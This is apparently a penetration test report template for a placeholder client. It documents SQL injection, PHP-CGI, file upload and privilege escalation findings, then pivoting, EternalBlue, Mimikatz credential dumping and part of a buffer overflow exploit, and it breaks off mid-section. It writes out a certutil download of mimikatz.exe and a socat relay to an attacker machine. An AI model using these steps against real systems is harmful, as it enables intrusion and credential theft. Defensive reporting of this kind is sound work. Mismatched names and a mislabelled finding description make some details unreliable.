Sensitive: The information in this document is strictly confidential and is intended for NOMBRECLIENTE

CYBERLAND SEC

Confidentiality Notice
This report contains sensitive, privileged, and confidential information. Precautions should be
taken to protect the confidentiality of the information in this document. Publication of this report
may cause reputational damage to NOMBRECLIENTE or facilitate attacks against
NOMBRECLIENTE. CYBERLAND SEC shall not be held liable for special, incidental, collateral
or consequential damages arising out of the use of this information.

Disclaimer
Note that this assessment may not disclose all vulnerabilities that are present on the systems
within the scope of the engagement. This report is a summary of the findings from a “point-in-
time” assessment made on NOMBRECLIENTE’s environment. Any changes made to the
environment during the period of testing may affect the results of the assessment.

NOMBRECLIENTE - CONFIDENTIAL Page 2

 CYBERLAND SEC

TABLE OF CONTENTS
Confidentiality Notice 1

Disclaimer 2

EXECUTIVE SUMMARY 5

HIGH LEVEL ASSESSMENT OVERVIEW 6

Observed Security Strengths 6

Areas for Improvement 6

Short Term Recommendations 7

SCOPE 8

Networks 8

NOMBRECLIENTE Environment 8

TESTING METHODOLOGY 9

CLASSIFICATION DEFINITIONS 10

Risk Classifications 10

Exploitation Likelihood Classifications 10

Business Impact Classifications 11

Remediation Difficulty Classifications 11

ASSESSMENT FINDINGS 12

Vulnerabilities Chart by Host 13

1 – 10.90.60.80 (NOMBRECLIENTE Web Server) 14

1.1 – SQL Injection 15

1.2 – PHP Common Gateway Interface (CGI) – CVE-2012-1823 19

1.3 – Cross Site Scripting (XSS) 22

1.4 – Unrestricted File Upload 24

1.5 – Privilege Escalation 27

1.6 – Information Disclosure 30

NOMBRECLIENTE - CONFIDENTIAL Page 3

 CYBERLAND SEC

1.7 - Previous Pivoting Setup 35

2 – 10.185.10.34 38

2.1 –Eternal Blue / PSEXEC - CVE-2017-0144 (MS17-010) 39

2.2 – Dumped Credentials - Mimikatz 42

2.3 - Previous Pivoting Setup 45

3 – 10.185.10.27 47

3.1 – Eternal Blue – CVE-2017-0144 (MS17-010) 48

3.2 – Dumped Credentials - Mimikatz 52

3.3 – Information Disclosure 54

3.4 - Previous Pivoting Setup 56

4 – 10.185.10.55 58

4.1 – Buffer Over Flow (BOF) 59

4.2 – WinSCP Credentials in Memory 73

5 – 10.185.11.127 80

5.1 – Privilege Escalation 81

REMEDIATION PLAN 85

EXPLOITED HOSTS AND VULNERABILITIES 88

APPENDIX A – TOOLS USED 89

APPENDIX B - ENGAGEMENT INFORMATION 90

Client Information 90

Version Information 90

Contact Information 90

NOMBRECLIENTE - CONFIDENTIAL Page 4

 CYBERLAND SEC

EXECUTIVE SUMMARY
CYBERLAND SEC performed a security assessment of the internal corporate network of
NOMBRECLIENTE on 25/05/2024. Cyber Dark Trace’s penetration test simulated an attack
from an external threat actor attempting to gain access to systems within the NOMBRECLIENTE
corporate network. The purpose of this assessment was to discover and identify vulnerabilities
in NOMBRECLIENTE’s infrastructure and suggest methods to remediate the vulnerabilities.
CYBERLAND SEC identified a total of 14 vulnerabilities within the scope of the engagement
which are broken down by severity in the table below.

CRITICAL HIGH MEDIUM LOW

8 4 1 1

The highest severity vulnerabilities give potential attackers the opportunity to execute arbitrary
code, gain unauthorized administrative access, exfiltrate sensitive data, and disrupt services.
These actions can lead to significant consequences, including data breaches, financial loss,
reputational damage, and operational downtime. Attackers might exploit these vulnerabilities to
install malware, manipulate or delete critical data, and move laterally within the network to
compromise additional systems. In order to ensure data confidentiality, integrity, and availability,
security remediations should be implemented as described in the security assessment findings.

Note that this assessment may not disclose all vulnerabilities that are present on the systems
within the scope. Any changes made to the environment during the period of testing may affect
the results of the assessment.

NOMBRECLIENTE - CONFIDENTIAL Page 5

 CYBERLAND SEC

HIGH LEVEL ASSESSMENT OVERVIEW

Observed Security Strengths

CYBERLAND SEC identified the following strengths in NOMBRECLIENTE’s network which
greatly increases the security of the network. NOMBRECLIENTE should continue to monitor
these controls to ensure they remain effective.

Network Segmentation
● Excellent implementation of network segmentation that isolates critical systems,
preventing lateral movement by attackers.

Regular Security Audits

• Proactive regular security audits and vulnerability assessments to identify and address
potential threats before they can be exploited.

Encryption
• Use of strong encryption protocols for data at rest and in transit, protecting sensitive
information from being intercepted or accessed by unauthorized parties.

Areas for Improvement

CYBERLAND SEC recommends NOMBRECLIENTE takes the following actions to improve the
security of the network. Implementing these recommendations will reduce the likelihood that an
attacker will be able to successfully attack NOMBRECLIENTE’s information systems and/or
reduce the impact of a successful attack.

NOMBRECLIENTE - CONFIDENTIAL Page 6

 CYBERLAND SEC

Short Term Recommendations

CYBERLAND SEC recommends NOMBRECLIENTE take the following actions as soon as
possible to minimize business risk.

Incident Response
● Review and update the incident response plan to ensure it is ready to address potential
security incidents promptly and effectively.

Backup and Recovery

• Verify that all critical data is backed up regularly and that backup systems are
functioning correctly and securely.

Network Monitoring
• Implement and configure network monitoring tools to detect and respond to suspicious
activities in real-time.

Patch Management
• Ensure all systems and applications are updated with the latest security patches to
mitigate known vulnerabilities.

NOMBRECLIENTE - CONFIDENTIAL Page 7

 CYBERLAND SEC

SCOPE
All testing was based on the scope as defined in the Request For Proposal (RFP) and official
written communications. The items in scope are listed below.

Networks
Network Note

10.90.60.80 Web Server – foophonesels.com

10.185.10.0/23 Organization Network

10.185.10.0/24 Corporate Network

10.185.11.0/24 DMZ

NOMBRECLIENTE Environment

NOMBRECLIENTE - CONFIDENTIAL Page 8

 CYBERLAND SEC

TESTING METHODOLOGY
CYBERLAND SEC’s testing methodology was split into three phases: Reconnaissance, Target
Assessment, and Execution of Vulnerabilities. During reconnaissance, we gathered information
about Foo Pones LLC’s network systems. CYBERLAND SEC used port scanning and other
enumeration methods to refine target information and assess target values. Next, we conducted
our targeted assessment. CYBERLAND SEC simulated an attacker exploiting vulnerabilities in
the NOMBRECLIENTE network. CYBERLAND SEC gathered evidence of vulnerabilities during
this phase of the engagement while conducting the simulation in a manner that would not
disrupt normal business operations.

The following image is a graphical representation of this methodology.

NOMBRECLIENTE - CONFIDENTIAL Page 9

 CYBERLAND SEC

CLASSIFICATION DEFINITIONS
Risk Classifications

Level Score
Description

The vulnerability poses an immediate threat to the

Critical 9-10 organization. Successful exploitation may permanently affect
the organization. Remediation should be immediately
performed.

The vulnerability poses an urgent threat to the organization,

High 7-8 and remediation should be prioritized.

Successful exploitation is possible and may result in notable

Medium 4-6 disruption of business functionality. This vulnerability should
be remediated when feasible.

The vulnerability poses a negligible/minimal threat to the

Low 1-3 organization. The presence of this vulnerability should be
noted and remediated if possible.

These findings have no clear threat to the organization, but

Informational 0 may cause business processes to function differently than
desired or reveal sensitive information about the company.

Exploitation Likelihood Classifications

Likelihood Description

Exploitation methods are well-known and can be performed using

Likely publicly available tools. Low-skilled attackers and automated tools
could successfully exploit the vulnerability with minimal difficulty.

Exploitation methods are well-known, may be performed using

Possible public tools, but require configuration. Understanding of the
underlying system is required for successful exploitation.

Exploitation requires deep understanding of the underlying

Unlikely systems or advanced technical skills. Precise conditions may be
required for successful exploitation.

NOMBRECLIENTE - CONFIDENTIAL Page 10

 CYBERLAND SEC

Business Impact Classifications

Impact Description

Successful exploitation may result in large disruptions of critical

Major business functions across the organization and significant financial
damage.

Successful exploitation may cause significant disruptions to non-

Moderate critical business functions.

Successful exploitation may affect few users, without causing

Minor much disruption to routine business functions.

Remediation Difficulty Classifications

Difficulty Description

Remediation may require extensive reconfiguration of underlying

Hard systems that is time consuming. Remediation may require
disruption of normal business functions.

Remediation may require minor reconfigurations or additions that

Moderate may be time-intensive or expensive.

Remediation can be accomplished in a short amount of time, with

Easy little difficulty.

NOMBRECLIENTE - CONFIDENTIAL Page 11

 CYBERLAND SEC

ASSESSMENT FINDINGS
Number Finding Risk Score Risk Host

1 SQL Injection 10 Critical 10.90.60.80

2 PHP Common Gateway Interface (CGI) – 10 Critical 10.90.60.80

CVE-2012-1823

3 File Upload 10 Critical 10.90.60.80

4 Privilege Escalation 10 Critical 10.90.60.80

5 Eternal Blue – CVE-2017-0144 (MS17-010) 10 Critical 10.185.10.27

6 Eternal Blue – CVE-2017-0144 (MS17-010) 10 Critical 10.185.10.34

7 Information Disclosure 9 Critical 10.90.60.80

8 Privilege Escalation 9 Critical 10.185.11.127

9 Dumped Credentials - Mimikatz 8 High 10.185.10.27

10 Buffer Over Flow (BOF) 8 High 10.185.10.55

11 WinSCP Credentials in Memory 8 High 10.185.10.55

12 Dumped Credentials - Mimikatz 8 High 10.185.10.34

13 Cross Site Scripting (XSS) 6 Medium 10.90.60.80

14 Information Disclosure 3 Low 10.185.10.27

TEMPLATE NOTE: (Sorting by descending risk score)

NOMBRECLIENTE - CONFIDENTIAL Page 12

 CYBERLAND SEC

Vulnerabilities Chart by Host

NOMBRECLIENTE - CONFIDENTIAL Page 13

 CYBERLAND SEC

1 – 10.90.60.80 (Web Server)

10.90.60.80
Linux

# Port Protocol / Service

80 HTTP

5923 HTTP

Figure 1.1: NMAP

Figure 1.2: NMAP open ports

NOMBRECLIENTE - CONFIDENTIAL Page 14

 CYBERLAND SEC

1.1 – SQL Injection

CRITICAL

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Code Injection

Description
SQL injection is a cyber attack technique that exploits vulnerabilities in a web application's
software by inserting malicious SQL queries, allowing attackers to manipulate and access the
application's database unauthorizedly. This can lead to data breaches, data loss, and
unauthorized administrative access.

Analysis
At the address http://10.90.60.80:5923/login.php we find a login panel in which we can take
advantage of this vulnerability.

Figure 1.1.1: SQL Injection

Seeing that it is vulnerable, we can try to intercept the request with burpsuite and later with
Sqlmap to see if we can access the database.

NOMBRECLIENTE - CONFIDENTIAL Page 15

 CYBERLAND SEC

Figure 1.1.2: Intercept POST with Burpsuit

Figure 1.1.3a: Sqlmap

NOMBRECLIENTE - CONFIDENTIAL Page 16

 CYBERLAND SEC

Figure 1.1.3b: MySQL DataBase

The address http://10.90.60.80:5923/services.php contains the same vulnerability. In addition,
we can also obtain a shell with which we will gain access to the system.

Figure 1.1.4a: MySQL Shell command

NOMBRECLIENTE - CONFIDENTIAL Page 17

 CYBERLAND SEC

Figure 1.1.4b: MySQL Shell

Remediation Plan

• Mitigating SQL injection primarily involves input validation. Input validation ensures that
the type, length, and format of user input are acceptable, allowing only valid data to be
processed. This prevents malicious commands from being executed. Key practices
include using regular expressions as whitelists for structured data and ensuring fixed set
values (e.g., from drop-down lists) match one of the offered options exactly.

References

● https://github.com/sqlmapproject/sqlmap

NOMBRECLIENTE - CONFIDENTIAL Page 18

 CYBERLAND SEC

1.2 – PHP Common Gateway Interface (CGI) – CVE-2012-1823

CRITICAL

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Code Injection

Description
CVE-2012-1823 is a critical vulnerability in the Common Gateway Interface (CGI)
implementation of PHP, allowing remote attackers to execute arbitrary code via query strings
containing PHP code. This can lead to complete server compromise and unauthorized access
to sensitive data.

Analysis
Enumerating with the Nikto tool, we found that it is vulnerable to CGI

Figure 1.2.1: Enumeration with Nikto tool

NOMBRECLIENTE - CONFIDENTIAL Page 19

 CYBERLAND SEC

Figure 1.2.2: PoC PHP CGI Vulnerability

We corroborate the vulnerability and use a metasploit module which allows us to obtain a
meterpreter session.

NOMBRECLIENTE - CONFIDENTIAL Page 20

 CYBERLAND SEC

Figure 1.2.3: Metasploit PHP CGI Module

Remediation Plan

• Upgrade to PHP version 5.3.12, PHP version 5.4.2, or a later release. Alternatively, you
can use this 'mod_rewrite' rule as a temporary solution:

RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]

RewriteRule ^(.*) $1?

References

• https://pentesterlab.com/exercises/cve-2012-1823/course

NOMBRECLIENTE - CONFIDENTIAL Page 21

 CYBERLAND SEC

1.3 – Cross Site Scripting (XSS)

MEDIUM

Exploitation Likelihood Possible

Business Impact Moderate

Remediation Difficulty Moderate

Type Code Injection

Description
Cross-Site Scripting (XSS) is a security vulnerability that allows attackers to inject malicious
scripts into webpages viewed by other users. This can lead to data theft, session hijacking, and
defacement of the website.

Analysis
We edit the request to address http://10.90.60.80/welcome.php, add the script and check that
scripts can be injected.

Figure 1.3.1: XSS PoC

NOMBRECLIENTE - CONFIDENTIAL Page 22

 CYBERLAND SEC

Remediation Plan

• Escaping: This involves processing user input to ensure it is safe before rendering it. By
escaping key characters like < and >, you prevent them from being interpreted
maliciously.

• Validating Input: This ensures only correct data is rendered by the application,
preventing malicious input. Whitelisting known good characters is more effective than
blacklisting bad characters for preventing XSS.

• Sanitizing: This method cleans user input to remove potentially harmful markup,
especially useful for sites that allow HTML. It should be used alongside escaping and
validating input for robust protection.

References

• https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Chea
t_Sheet.html

NOMBRECLIENTE - CONFIDENTIAL Page 23

 CYBERLAND SEC

1.4 – Unrestricted File Upload

CRITICAL

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type File Upload

Description
A file upload vulnerability occurs when a web application does not properly validate or restrict
the types and content of files uploaded by users. Attackers can exploit this weakness by
uploading malicious files, such as scripts or executables, which can then be executed on the
server. This can lead to severe consequences, including remote code execution, unauthorized
access to sensitive data, defacement of websites, and the installation of malware.

Analysis
Doing an exhaustive scan of files and directories with the GoBuster tool, we found two in
particular, /account.php (in which we can create a service and upload a file) and /pdf (in which
the uploaded files are saved).

Figure 1.4.1: Scanning files and directories with GoBuster tool

NOMBRECLIENTE - CONFIDENTIAL Page 24

 CYBERLAND SEC

Figure 1.4.2: /account.php

Figure 1.4.3: /newservice.php – File Upload Page

NOMBRECLIENTE - CONFIDENTIAL Page 25

 CYBERLAND SEC

Figure 1.4.4: /pdf – Uploads Directory

Remediation Plan

• Content-Type Header Validation: Ensure the "Content-Type" header in the request

indicates a valid file type. However, this can be bypassed by altering the header using a
web proxy.

• Whitelisting File Extensions: Use a whitelist to validate file extensions, ensuring to

review the list for potentially malicious extensions. Also, watch for bypass techniques like
double extensions.

• File Type Detector: Employ functions or APIs to check file types by examining the file's
initial characters or headers. Be cautious as attackers can insert malicious code within
valid headers or file metadata, and obfuscate or encode it to bypass detection. Ensure
the application handles compressed files securely to prevent crafting of malicious code.

References

• https://medium.com/@venkatasaimanikantamanugula/a-guide-to-preventing-file-upload-
vulnerabilities-part-i-d1667eea0955

NOMBRECLIENTE - CONFIDENTIAL Page 26

 CYBERLAND SEC

1.5 – Privilege Escalation

CRITICAL

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Privilege Escalation

Description
Privilege escalation is a type of security vulnerability where an attacker gains elevated access to
resources that are normally protected from an application or user. This can occur in two forms:
1. Vertical Privilege Escalation: The attacker gains higher-level access than intended,
such as gaining administrative privileges.
2. Horizontal Privilege Escalation: The attacker accesses resources or functions
intended for other users with similar access levels.
Exploiting privilege escalation vulnerabilities can lead to unauthorized access to sensitive data,
the ability to alter system configurations, or even full control over the affected system. This
makes it crucial for systems to enforce strict access controls and regularly update and patch
software to prevent such exploits.

Analysis
Once we have uploaded a malicious bash script (taking advantage of the file upload
vulnerability) and execute it, while listening with the Netcat tool, we access the system with
www-data user privileges (non-administrator user).

Figure 1.5.1: Accessing the system as user www-data

NOMBRECLIENTE - CONFIDENTIAL Page 27

 CYBERLAND SEC

Once we have gained access to the system, with the sudo -l command we can know which files
or binaries have permissions to run the www-data user as administrator.

Figure 1.5.2: Discovering that we can run as an administrator user

User www-data can run the backup.pl (Perl) file in which he is calling the copy.sh file and
apparently is making a copy of the .txt files in the directory. We can add a last command line
that when we execute the backup.pl file and the script ends, it will give us a session as an
administrator user.

NOMBRECLIENTE - CONFIDENTIAL Page 28

 CYBERLAND SEC

Figure 1.5.3: Modification of copy.sh

Figure 1.5.4: We are root

Remediation Plan

• A low-privileged user should never be allowed to execute commands as a root user or

alter files that belong to root or are located in the root directory under any circumstances.

References

• https://medium.com/secure-you/common-linux-privilege-escalation-d441329f41f9

NOMBRECLIENTE - CONFIDENTIAL Page 29

 CYBERLAND SEC

1.6 – Information Disclosure

CRITICAL

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Information Disclosure

Description
Information disclosure is a security vulnerability where sensitive data, such as system
configurations or user details, is exposed to unauthorized users. This can aid attackers in
planning further attacks, such as data breaches or privilege escalation.

Analysis
When we have accessed the system as administrator we have been able to list the directories,
finding in the user Michael's directory a file that gives us information about a computer that is on
the corporate network (10.185.10.0/24)

Figure 1.6.1: Host and Credentials Discovery

NOMBRECLIENTE - CONFIDENTIAL Page 30

 CYBERLAND SEC

We have also been able to find a file that shows us the access credentials to the Database that
it has locally.

Figure 1.6.2: Credentials of the Data Base

NOMBRECLIENTE - CONFIDENTIAL Page 31

 CYBERLAND SEC

Figure 1.6.3: MySQL Data Base

NOMBRECLIENTE - CONFIDENTIAL Page 32

 CYBERLAND SEC

Figure 1.6.4: Credentials founded on MySQL Database

Additionally, we can list the users' hashes in the /etc/shadow file seeing that they have weak
encryption (MD5) and with tools like Jhon the ripper or Hashcat we could crack them and if they
were reused credentials it would be a bigger problem.

NOMBRECLIENTE - CONFIDENTIAL Page 33

 CYBERLAND SEC

Figure 1.5.4: /etc/shadow file

Remediation Plan

• If storing credentials in configuration files is unavoidable, ensure the files are encrypted
using strong encryption standards like AES-256. Ensure only authorized processes or
users can decrypt and access these files.

• Use secrets management solutions like HashiCorp Vault, AWS Secrets Manager, or
Azure Key Vault to securely store and manage access to sensitive information.

NOMBRECLIENTE - CONFIDENTIAL Page 34

 CYBERLAND SEC

• Replace MD5 with more secure algorithms like bcrypt, Argon2, or SHA-256. These
algorithms provide better security through stronger encryption and built-in mechanisms
to mitigate brute force attacks.

References

• https://www.quora.com/What-makes-MD5-such-a-bad-hashing-algorithm

1.7 - Previous Pivoting Setup

In order to gain access to machine 10.185.10.34 we will need to configure, using the Chisel tool,
a server on our attacking machine and through the host 10.90.60.80, create a tunnel through
which we can send commands to machine 10.185.10.34 from our machine .

First, we pass the files to machine 10.90.60.80 through an http server with python that we run
on our machine to be able to share files with machine 10.90.60.80

Figure 1.7.1: Python HTTP Server – Share files

NOMBRECLIENTE - CONFIDENTIAL Page 35

 CYBERLAND SEC

Figure 1.7.2: Download the files and grant execution permissions

We run the Chisel server on our machine and the client on machine 10.90.60.80

Figure 1.7.3: Chisel Server

Figure 1.7.4: Chisel Client on 10.90.60.80

NOMBRECLIENTE - CONFIDENTIAL Page 36

 CYBERLAND SEC

Now we only have to edit the /etc/proxychains4.conf file and add the tunnel that has been
created

Figure 1.7.5: Edit /etc/proxychains4.conf file

NOMBRECLIENTE - CONFIDENTIAL Page 37

 CYBERLAND SEC

2 – 10.185.10.34

10.185.10.34
Windows 7 SP1

# Port Protocol / Service

135 Msrpc

139 Netbios-ssn

445 SMB

Figure 2a: NMAP - Proxychains

NOMBRECLIENTE - CONFIDENTIAL Page 38

 CYBERLAND SEC

Figure 2b: NMAP open ports

2.1 –Eternal Blue / PSEXEC - CVE-2017-0144 (MS17-010)

CRITICAL

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Credentials

Description
Storing credentials in plain text within a configuration file, like mount_windows_mf.sh, is a
significant security vulnerability. If an attacker gains access to this file, they can easily read the
unencrypted credentials and use them to access sensitive systems or data. This practice
compromises the security of the entire system, emphasizing the need to store credentials
securely, using encryption and secure vaults to protect against unauthorized access and
potential breaches.

Analysis
Using the psexec tool of the impacket module, with the following command we can access the
machine with administrator privileges.

NOMBRECLIENTE - CONFIDENTIAL Page 39

 CYBERLAND SEC

Figure 2.1.1: PSEXEC tool – Administrator access to Machine

Browsing through the directories we find some files that appear to be a binary executed on
another machine, we download them since we will use them later.

Figure 2.1.2: Host Discovery – 10.185.10.55

NOMBRECLIENTE - CONFIDENTIAL Page 40

 CYBERLAND SEC

Figure 2.1.3: SMBCLIENT

Figure 2.1.4: Download files

Additionally, using the arp -a command, we find another active host, 10.185.10.27.

Figure 2.1.5: Host Discovery- 10.185.10.27

NOMBRECLIENTE - CONFIDENTIAL Page 41

 CYBERLAND SEC

And another way to discover hosts on Windows, with a ping sweep

Figure 2.1.6: Ping sweep on Windows

Remediation Plan

• To prevent them from entering through the psexec module (abusing the MS-17-010
vulnerability) is to apply the Windows 7 security patch

• If it’s possible, upgrade to the next version of Windows (Preferably Windows 10)

References

• https://github.com/rapid7/metasploit-
framework/blob/master/documentation/modules/exploit/windows/smb/psexec.md

• https://support.microsoft.com/en-us/help/4023262/how-to-verify-that-ms17-010-is-
installed

2.2 – Dumped Credentials - Mimikatz

HIGH

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Credentials saved in memory

Description
Credential dumping with Mimikatz is a technique where an attacker uses the Mimikatz tool to
extract plaintext passwords, hash values, PINs, and Kerberos tickets from memory on a

NOMBRECLIENTE - CONFIDENTIAL Page 42

 CYBERLAND SEC

Windows system. This allows attackers to gain unauthorized access to user accounts and
escalate privileges within the network.

Analysis
Using the mimikatz tool that we have previously obtained with the command:
certutil -split -urlcache -f http://10.90.60.80:5923/pdf/mimikatz.exe

Figure 2.2.1a: Mimikatz lsadump::sam

NOMBRECLIENTE - CONFIDENTIAL Page 43

 CYBERLAND SEC

Figure 2.2.1b: Mimikatz lsadump::secrets

Remediation Plan

● Regularly apply patches and updates

● Disable NTLM Authentication: Use secure protocols like Kerberos

References

• https://www.lockardsecurity.com/2023/04/13/how-to-detect-and-prevent-the-hacking-
tool-mimikatz/

NOMBRECLIENTE - CONFIDENTIAL Page 44

 CYBERLAND SEC

2.3 - Previous Pivoting Setup

In order to gain access to machine 10.185.10.27 we will need to configure, using the Chisel tool,
a server on our attacking machine and through the host 10.90.60.80, create a tunnel through
which we can send commands to machine 10.185.10.27 from our machine.

Figure 2.3.2: Getting files with Certutil command

We run socat on machine 10.90.60.80 to listen and forward traffic to the attacking machine
172.16.40.5 with the following command: socat TCP-LISTEN:5543,fork TCP:172.16.40.5:33

We run the chisel client on machine 10.185.10.34 to send a tunnel to the attacking machine
(thanks to running socat on the intermediate machine).

Figure 2.3.3: Connection to Chisel Server

We check the Chisel server on the attacking machine to see if the tunnel has been created.

Figure 2.3.4: New tunnel on Chisel Server

NOMBRECLIENTE - CONFIDENTIAL Page 45

 CYBERLAND SEC

Now we only have to edit the /etc/proxychains4.conf file and add the tunnel that has been
created

Figure 2.3.5: Edit /etc/proxychains4.conf file

NOMBRECLIENTE - CONFIDENTIAL Page 46

 CYBERLAND SEC

3 – 10.185.10.27

10.185.10.27
Windows 7 SP1

# Port Protocol / Service

135 Msrpc

139 Netbios-ssn

445 SMB

Figure 3a: NMAP - Proxychains

NOMBRECLIENTE - CONFIDENTIAL Page 47

 CYBERLAND SEC

3.1 – Eternal Blue – CVE-2017-0144 (MS17-010)

CRITICAL

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Credentials

Description
EternalBlue is a critical vulnerability in Microsoft's Server Message Block (SMB) protocol,
identified as CVE-2017-0144. Discovered by the NSA and later leaked by the hacking group
Shadow Brokers, this flaw allows remote attackers to execute arbitrary code on unpatched
Windows systems without requiring user interaction. EternalBlue exploits a flaw in the SMBv1
protocol, enabling attackers to gain full control of the affected machine.

Analysis
We check with the NMAP tool if it is vulnerable to Eternal Blue.

NOMBRECLIENTE - CONFIDENTIAL Page 48

 CYBERLAND SEC

Figure 3.1.1: NMAP – Eternal Blue Check

We download the Auto Blue repository from Github.

Figure 3.1.2: Download Auto Blue repository

NOMBRECLIENTE - CONFIDENTIAL Page 49

 CYBERLAND SEC

We generate the payload with the script shell_code.sh

Figure 3.1.3: Generating Exploit

Since we have sent the reverse shell connection to machine 10.90.60.80, we listen via socat
and forward the traffic to port 3333 of the attacking machine.

Figure 3.1.4: Redirect traffic with Socat

NOMBRECLIENTE - CONFIDENTIAL Page 50

 CYBERLAND SEC

We listen through Netcat and execute the exploit with proxychains.

Figure 3.1.5: Executing Exploit

Receiving of the reverse shell and we have administrator privileges.

Figure 3.1.6: Connection to the Host

Remediation Plan

• To prevent them from entering through the psexec module (abusing the MS-17-010
vulnerability) is to apply the Windows 7 security patch.

• If it’s possible, upgrade to the next version of Windows (Preferably Windows 10).

References

• https://github.com/3ndG4me/AutoBlue-MS17-010

NOMBRECLIENTE - CONFIDENTIAL Page 51

 CYBERLAND SEC

3.2 – Dumped Credentials - Mimikatz

HIGH

Exploitation Likelihood Likely

Business Impact Major

Remediation Difficulty Easy

Type Credentials saved in memory

Description
Credential dumping with Mimikatz is a technique where an attacker uses the Mimikatz tool to
extract plaintext passwords, hash values, PINs, and Kerberos tickets from memory on a
Windows system. This allows attackers to gain unauthorized access to user accounts and
escalate privileges within the network.

Analysis
Using the mimikatz tool that we have previously obtained with the command:
certutil -split -urlcache -f http://10.90.60.80:5923/pdf/mimikatz.exe

Figure 2.2.1a: Mimikatz lsadump::sam

NOMBRECLIENTE - CONFIDENTIAL Page 52

 CYBERLAND SEC

Figure 2.2.1b: Mimikatz lsadump::secrets

Remediation Plan

● Regularly apply patches and updates

● Disable NTLM Authentication: Use secure protocols like Kerberos

References

• https://www.lockardsecurity.com/2023/04/13/how-to-detect-and-prevent-the-hacking-
tool-mimikatz/

NOMBRECLIENTE - CONFIDENTIAL Page 53

 CYBERLAND SEC

3.3 – Information Disclosure

LOW

Exploitation Likelihood Likely

Business Impact Minor

Remediation Difficulty Easy

Type Information Disclosure

Description
Information disclosure is a security vulnerability where sensitive data is unintentionally exposed
to unauthorized users. This can include system configurations, user credentials, personal data,
and internal network information. Information disclosure can occur through various means, such
as error messages, improper access controls, insecure data transmission, or flaws in application
design.

Analysis
By enumerating directories, we find a file that contains information about a host on the network

NOMBRECLIENTE - CONFIDENTIAL Page 54

 CYBERLAND SEC

Figure 3.3.1: Information about a Host

Remediation Plan

● Delete the file

● To mitigate this risk, it is essential to implement proper data handling practices, enforce
strict access controls, securely configure systems, and regularly audit for potential leaks.

NOMBRECLIENTE - CONFIDENTIAL Page 55

 CYBERLAND SEC

3.4 - Previous Pivoting Setup

In order to gain access to machine 10.185.10.55 we will need to configure, using the Chisel tool,
a server on our attacking machine and through the host 10.90.60.80, create a tunnel through
which we can send commands to machine 10.185.10.55 from our machine.

Figure 3.4.1: Socat on 10.90.60.80 listening to 10.185.10.27

We move the files to machine 10.185.10.27 and run chisel in client mode.

Figure 3.4.2: Connection with the Chisel Server

Figure 3.4.3: New tunnel created

NOMBRECLIENTE - CONFIDENTIAL Page 56

 CYBERLAND SEC

Figure 3.4.4: Edit /etc/proxychains4.conf file

NOMBRECLIENTE - CONFIDENTIAL Page 57

 CYBERLAND SEC

4 – 10.185.10.55

10.185.10.55
Windows

# Port Protocol / Service

42424 Customer Manager Portal

Figure 4a: NMAP - Proxychains

NOMBRECLIENTE - CONFIDENTIAL Page 58

 CYBERLAND SEC

4.1 – Buffer Over Flow (BOF)

HIGH

Exploitation Likelihood Possible

Business Impact Major

Remediation Difficulty Moderate

Type Buffer Over Flow

Description
A buffer overflow is a type of security vulnerability that occurs when a program writes more data
to a buffer than it can hold. Buffers are contiguous blocks of memory that store data temporarily.
When a buffer overflows, the excess data can overwrite adjacent memory, leading to
unpredictable behavior, crashes, or the execution of malicious code.

Attackers exploit buffer overflows by carefully crafting input data that exceeds the buffer's
capacity and includes executable code. This malicious code can then be executed with the
privileges of the vulnerable program, potentially allowing the attacker to gain unauthorized
access, escalate privileges, or take control of the affected system.

Analysis
Previously we downloaded the files from the
C:\\Users\developer\Desktop\CustomerManagerDev directory on machine 10.185.10.34 and
transferred the files to a local Windows machine of ours to do tests before attacking host
10.185.10.55

With the Immunity Debugger tool and the mona.py file (which we previously had to copy to the
PyCommands folder of Immunity Debugger) we will recreate the same scenario as on machine
10.185.10.55 and we will be able to design the final payload to gain access later.

We open Immunity Debugger, load the CustomerManagerService.exe file and establish the one
in which we have the file as the working folder.

NOMBRECLIENTE - CONFIDENTIAL Page 59

 CYBERLAND SEC

Figure 4.1.1: Setting Working Folder

We generate a file to know how many bytes the program crashes at and then obtain the offset.

Figure 4.1.2: Fuzzing.py

NOMBRECLIENTE - CONFIDENTIAL Page 60

 CYBERLAND SEC

Figure 4.1.3: Crashes at 100 bytes of data

Now we will create another script that we will modify throughout the exploitation.

NOMBRECLIENTE - CONFIDENTIAL Page 61

 CYBERLAND SEC

Figure 4.1.4: Exploit.py

With the metasploit module pattern_create.rb we generate 500 bytes of data to later compare in
the Immunity Debuger and calculate the offset.

Figure 4.1.5: pattern_create.rb metasploit module

NOMBRECLIENTE - CONFIDENTIAL Page 62

 CYBERLAND SEC

Figure 4.1.6: Add payload to exploit.py

Now the program crashes and gives us a different EIP number.

Figure 4.1.7: Crash and new EIP number

NOMBRECLIENTE - CONFIDENTIAL Page 63

 CYBERLAND SEC

With another metasploit module (pattern_offset.rb) we managed to calculate the offset and
added it to the exploit.py

Figure 4.1.8: Calculating the Offset

Figure 4.1.9: Edit exploit.py

NOMBRECLIENTE - CONFIDENTIAL Page 64

 CYBERLAND SEC

Figure 4.1.10: Controlling the EIP

Once we have control of the binary, we add the badchars to our exploit

Figure 4.1.11: Badchars

NOMBRECLIENTE - CONFIDENTIAL Page 65

 CYBERLAND SEC

We put the following mona command in the Immunity Debugger: !mona bytearray -b ¨\x00¨ and
run the exploit.py again

Figure 4.1.12: mona bytearray command

We compare with mona: !mona compare C:\\The_Working_Folder\bytearray.bin -a ESP_number

Figure 4.1.13: mona bytearray compare

